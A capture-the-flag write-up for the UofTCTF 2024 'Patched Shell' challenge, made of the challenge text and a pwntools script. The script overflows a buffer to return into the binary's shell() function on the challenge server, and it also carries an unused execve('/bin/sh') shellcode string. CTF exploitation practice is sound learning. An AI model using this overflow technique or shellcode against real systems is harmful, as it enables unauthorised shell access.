UofTCTF 2024 : Patched Shell

Subject

Okay, okay. So you were smart enough to do basic overflow huh...

Now try this challenge! I patched the shell function so it calls system instead of execve... so now your exploit shouldn't work! bwahahahahaha

Note: due to the copycat nature of this challenge, it suffers from the same bug that was in basic-overflow. See the cryptic message there for more information.

Author: drec

nc 34.134.173.142 5000

Writeup

from pwn import *

# Local testing: r = process('./patched-shell')
r = remote("34.134.173.142", 5000)
elf = ELF('./patched-shell')

# Address of the binary's shell() function (non-PIE, so it is fixed).
addr_shell = elf.symbols['shell']
print(hex(addr_shell))

# Leftover from basic-overflow: an execve("/bin/sh") stub that is not
# used in this payload, since we return into the existing shell() function.
shellcode = b"\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05"
print(len(shellcode))

# Hard-coded little-endian return address 0x401137, expected to match
# addr_shell printed above.
addr = p64(0x401137)

# 72 bytes of filler reach the saved return address, which is then
# overwritten with the address of shell().
payload = b'\x90' * (90 - 18) + addr
r.sendline(payload)
print(payload)

# Keep a copy of the payload for local debugging.
with open("payload", "wb") as f:
    f.write(payload)
r.interactive()